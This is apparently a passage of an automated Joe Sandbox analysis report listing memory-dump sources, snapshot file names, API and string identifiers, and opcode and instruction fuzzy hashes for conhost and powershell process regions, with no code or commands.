                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-2713391170
                                                                                                                                                              • Opcode ID: 6c1bb04fb518506022f5e99638b645748c5ad941913315fb580250ab61dbfd81
                                                                                                                                                              • Instruction ID: 86ddf7c8bf55c33c83ce867d8d8d978d7c4d5f5fea3cb95dd5c30a629f9044a4
                                                                                                                                                              • Opcode Fuzzy Hash: 6c1bb04fb518506022f5e99638b645748c5ad941913315fb580250ab61dbfd81
                                                                                                                                                              • Instruction Fuzzy Hash: FFF06217904E8882D2018F18A4001AAB370FF5E789F545325EE8D26528DF29D5578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4020351045-0
                                                                                                                                                              • Opcode ID: d5f71ea9b2ba0dc7262754e9b7f3f9d6a9cc23ee47e911203c7931b1a1512ad6
                                                                                                                                                              • Instruction ID: 90db0113e3de9bf0ca950c572f24bfb17867f5825369bfff379a5f843513ff3b
                                                                                                                                                              • Opcode Fuzzy Hash: d5f71ea9b2ba0dc7262754e9b7f3f9d6a9cc23ee47e911203c7931b1a1512ad6
                                                                                                                                                              • Instruction Fuzzy Hash: E6113023B0AE06D6EA54DB54AC8533827A1AFAC741F584434C40DC72BCDF7EE859830E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: _$uN_^
                                                                                                                                                              • API String ID: 0-4014890825
                                                                                                                                                              • Opcode ID: ced9990eda290b2ac65105a85c2504cc2905d79b3047313610a9e591fbfc3724
                                                                                                                                                              • Instruction ID: bf6772d7ebd79fc3cc193d86b16c0a677d6f48859bf2b87b92d6216785edde6c
                                                                                                                                                              • Opcode Fuzzy Hash: ced9990eda290b2ac65105a85c2504cc2905d79b3047313610a9e591fbfc3724
                                                                                                                                                              • Instruction Fuzzy Hash: C522D432B0CA8A8FEB55EF5CD8A55E97BE0FF56314F08017AD54DD7182DA29F8428780
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: wN_^
                                                                                                                                                              • API String ID: 0-475585179
                                                                                                                                                              • Opcode ID: 5baf05195d86267e49d1deb7c56513d2f18edbbca1ce0b05b4f668506e1b3d1e
                                                                                                                                                              • Instruction ID: d6732199f673e2ac5d4ba94513fb2ad5b3fd554285e6265f0f0ca91ca13bba6c
                                                                                                                                                              • Opcode Fuzzy Hash: 5baf05195d86267e49d1deb7c56513d2f18edbbca1ce0b05b4f668506e1b3d1e
                                                                                                                                                              • Instruction Fuzzy Hash: A3E14832A0CB865FE755DB1C88B55B97FE0EF57320B1801BED58AC7193DA1AB802C781
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: H
                                                                                                                                                              • API String ID: 0-2852464175
                                                                                                                                                              • Opcode ID: 3427a9ad1c0bd8b20999f5632d765490ff20d3917bcab8a26d859766948c4bc4
                                                                                                                                                              • Instruction ID: 9fbe3ac095a40616bf40a0d89b5df15900cf7c764fe8efa44ca9ec48b8fd5e14
                                                                                                                                                              • Opcode Fuzzy Hash: 3427a9ad1c0bd8b20999f5632d765490ff20d3917bcab8a26d859766948c4bc4
                                                                                                                                                              • Instruction Fuzzy Hash: D7E16030A08A4D8FDF99DF58C4A5EA97FE1FF69310F1441A9D44DD7296CA38E881CB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3a8b5739bedaccf5fc39ed9a2328054e0b58244e78dc2e9f2604c4325b10c738
                                                                                                                                                              • Instruction ID: 9654b0218216040a6df577d8b18aa25827c68982167c72117ad8ab6d5c102194
                                                                                                                                                              • Opcode Fuzzy Hash: 3a8b5739bedaccf5fc39ed9a2328054e0b58244e78dc2e9f2604c4325b10c738
                                                                                                                                                              • Instruction Fuzzy Hash: 58F1C471A0CA4E8FDB95EB6CC4A5AEA7BE1FF59304F1401B9D00DD7286DA38E845D780
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fbb91ec51470bfac0e42d1a93aa3df661ba8cdf9e319fb405865a7ca65447f58
                                                                                                                                                              • Instruction ID: 3005f0c0b0fe482d9db419c217e6d0666bb4347025619a028f3ffa8bdc115201
                                                                                                                                                              • Opcode Fuzzy Hash: fbb91ec51470bfac0e42d1a93aa3df661ba8cdf9e319fb405865a7ca65447f58
                                                                                                                                                              • Instruction Fuzzy Hash: 50E18431A0CA4D8FDF98EF5CC495AA97BE1FF69310F144169D40DD7296CA39E882CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fd8f2c3a71dae550ba89785944e4a1cd2c76f78208327e92f68dfade0d076b66
                                                                                                                                                              • Instruction ID: 9d13e5a8d8a5abfa1eb272e28e697b553d8d153784a44bf8d1e8e2e2d56b8301
                                                                                                                                                              • Opcode Fuzzy Hash: fd8f2c3a71dae550ba89785944e4a1cd2c76f78208327e92f68dfade0d076b66
                                                                                                                                                              • Instruction Fuzzy Hash: 7CB12D31A18A4D8FDF95EF5CD495AA9BBE1FFA9300F14416AD409D7295CB34E881CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fab066e8b5005572ea28a5dc2e06c7d30064d8058b636e89cad7f072d5b4af9d
                                                                                                                                                              • Instruction ID: 2c2810fd4efcba02d94631be1cf5ffd20224fd1eb52a6b8435042aa6c7a503de
                                                                                                                                                              • Opcode Fuzzy Hash: fab066e8b5005572ea28a5dc2e06c7d30064d8058b636e89cad7f072d5b4af9d
                                                                                                                                                              • Instruction Fuzzy Hash: 5F512C22B0CA468FEBA9DA5C54B12B477D2EF85730B5800BFC25DC7197DE1CE8018359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
                                                                                                                                                              • Instruction ID: 1d67cea7623b2511cd2c9d80a08de13d4e8d9550d673aea507a88136f15f82e6
                                                                                                                                                              • Opcode Fuzzy Hash: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
                                                                                                                                                              • Instruction Fuzzy Hash: CD31143191CB888FDB18DB5C9C4A6A97BE0FB69320F00426FE449D3252DA74A855CBC2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3040560603.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd3477d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 92614516343dfaf8b6f97a49ebf04251a4301911b0f06ec28cf1bdf5f12eaa38
                                                                                                                                                              • Instruction ID: ada1e605873c407839e29c9a2d6b8b060a2b1bbc3f7d866ec3d329af3489106b
                                                                                                                                                              • Opcode Fuzzy Hash: 92614516343dfaf8b6f97a49ebf04251a4301911b0f06ec28cf1bdf5f12eaa38
                                                                                                                                                              • Instruction Fuzzy Hash: 1241267140DBC48FE7568B289C959623FF0EF53224B1905EFD089CB1A3D629B84AC792
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
                                                                                                                                                              • Instruction ID: d591b63e0b60cec4ce36873b078e094a3255c4033aa2956d309c48b636028e8d
                                                                                                                                                              • Opcode Fuzzy Hash: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
                                                                                                                                                              • Instruction Fuzzy Hash: 7321073190CB4C4FDB59DFACD84A7E97BF0EB96321F04416BD448C3152DA74A816CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2ccb6b982221c8246c3d89547cf159bbb8f25444260bcc91d12ade881d7a20c3
                                                                                                                                                              • Instruction ID: b515b9665523156c5770147603b276d3fced4accd96404ea5ba01c5c0aeadc58
                                                                                                                                                              • Opcode Fuzzy Hash: 2ccb6b982221c8246c3d89547cf159bbb8f25444260bcc91d12ade881d7a20c3
                                                                                                                                                              • Instruction Fuzzy Hash: 0321E722B4DA478FE7A8DE8854F117462C2EF96730B4900BED65DC71ABCE1CEC009359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                              • Instruction ID: 76085c6dd3716b73fd176d99b8e85ba88af67c9da9f3be81d669a3198407d212
                                                                                                                                                              • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                              • Instruction Fuzzy Hash: D301677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3651D636E881CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8146b4a02df6343fcbfd97fdeac0c154443fb4cbc42250e13a4ee7aec5364f8e
                                                                                                                                                              • Instruction ID: 550643e1f16975faf7f8e9fb8aea15373ee5db32e938f576bf45bc7bc7f91d44
                                                                                                                                                              • Opcode Fuzzy Hash: 8146b4a02df6343fcbfd97fdeac0c154443fb4cbc42250e13a4ee7aec5364f8e
                                                                                                                                                              • Instruction Fuzzy Hash: 72F06C3170C90C4BE70C6A9CB8565F973D1D795361B10517FF44AC3697EC26AC8386C5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: edcec37ba492b1b856122c97c917f5aa774790ae09781bd631a72134a9b184d1
                                                                                                                                                              • Instruction ID: 288812b5649b8611f2ed784edaa87feb173e8a12984723a3d6155455df5707d0
                                                                                                                                                              • Opcode Fuzzy Hash: edcec37ba492b1b856122c97c917f5aa774790ae09781bd631a72134a9b184d1
                                                                                                                                                              • Instruction Fuzzy Hash: 01F0B4308086CD8FDB06DF64CC596D57FA0EF17215F050297E459C71A2DB78A558CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 80a3f460885ea7479df942685cea63193e9362c97a0acac8f3b9049c8c52240a
                                                                                                                                                              • Instruction ID: 11115ef504ec598cc1930174cf8ed60594ebf8a1bb5a98a00476538532ad3ad6
                                                                                                                                                              • Opcode Fuzzy Hash: 80a3f460885ea7479df942685cea63193e9362c97a0acac8f3b9049c8c52240a
                                                                                                                                                              • Instruction Fuzzy Hash: 40F0303171CF044FE748EF2DE8496A6B7E1FBA8355F20462FE44AC3651DA25E8818786
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000040.00000002.3047740660.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_64_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 12485b9fdb7489a08c3137ab7a38fbfb5b06947795396fcbc2ce5c8270fe246d
                                                                                                                                                              • Instruction ID: e19cc573dc101fe6c50e1f1e14f107c5e740c19e598c61674177c207a35cf437
                                                                                                                                                              • Opcode Fuzzy Hash: 12485b9fdb7489a08c3137ab7a38fbfb5b06947795396fcbc2ce5c8270fe246d
                                                                                                                                                              • Instruction Fuzzy Hash: 3EF05E32A0D5458FDB64EB9CE4A14E877E0FF4633071500BAE25DC75A7DA2AEC44C754
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%